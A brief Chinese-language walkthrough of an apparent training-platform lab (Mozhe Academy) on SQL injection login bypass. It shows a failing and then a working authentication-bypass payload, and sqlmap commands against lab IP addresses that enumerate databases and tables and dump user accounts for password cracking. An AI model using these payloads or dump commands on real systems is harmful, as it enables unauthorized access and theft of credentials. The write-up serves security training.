墨者学院 - SQL注入漏洞测试(登录绕过)

第一次尝试PHP万能密码登录

'or 1=1/*

提示：

查询失败You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' and password='b0baee9d279d34fa1dfd71aadb908c3f'' at line 1

经过排查，是在单引号“'”处出了问题，遂解决之：

' or 1=1#/*   密码随意

最终成功绕过，得到key。

还有一种操作方法

使用sqlmap扫描注入

暴库

python sqlmap.py -u "http://219.153.49.228:48709/" --forms --dbs

爆表

sqlmap.py -u "http://219.153.49.228:45047" --forms -D purchase --columns

爆账户

sqlmap.py -u "http://219.153.49.228:45047" --forms -D purchase --dump

解密即可获取用户名密码